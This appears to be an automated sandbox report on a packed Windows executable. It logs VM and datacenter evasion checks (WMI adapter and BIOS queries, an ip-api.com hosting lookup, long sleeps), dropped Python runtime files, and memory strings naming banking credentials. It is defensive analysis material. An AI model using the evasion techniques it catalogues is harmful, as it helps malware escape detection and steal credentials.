              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Check if machine is in data center or colocation facility
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8220Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1206Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8636
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 762
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7500
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2060
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2608
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4492
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2503
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2843
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1737
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3103
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3457
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2802
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1189
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\unicodedata.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.dllJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33962\python312.dllJump to dropped file
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-17263
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeAPI coverage: 4.7 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 8220 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep count: 1206 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -9223372036854770s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep count: 8636 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep count: 762 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -8301034833169293s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep count: 7500 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep count: 2060 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6684Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep count: 2608 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep count: 271 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4240Thread sleep count: 4492 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2468Thread sleep count: 2503 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840Thread sleep time: -10145709240540247s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2500Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep count: 2843 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep count: 1737 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep count: 3103 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep count: 443 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep count: 3457 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5932Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2232Thread sleep count: 248 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344Thread sleep count: 2802 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1552Thread sleep count: 1189 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF7C26683B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26692F0 FindFirstFileExW,FindClose,4_2_00007FF7C26692F0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF7C26818E4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26692F0 FindFirstFileExW,FindClose,7_2_00007FF7C26692F0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00007FF7C26683B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_00007FF7C26818E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080B46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,97_2_00007FF7080B46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080AE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,97_2_00007FF7080AE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080F88E0 FindFirstFileExA,97_2_00007FF7080F88E0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C031230 GetSystemInfo,7_2_00007FFB0C031230
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\AppxSip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\en-GB\CRYPT32.dll.mui
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\OpcServices.DLL
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\7488c4f196cfa60a4ca5cca24e2169b0\Microsoft.Management.Infrastructure.ni.dll
              Source: getmac.exe, 0000004D.00000002.1482841194.0000028230D74000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1482040663.0000028230D4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvmwaretray
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C3400000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc0
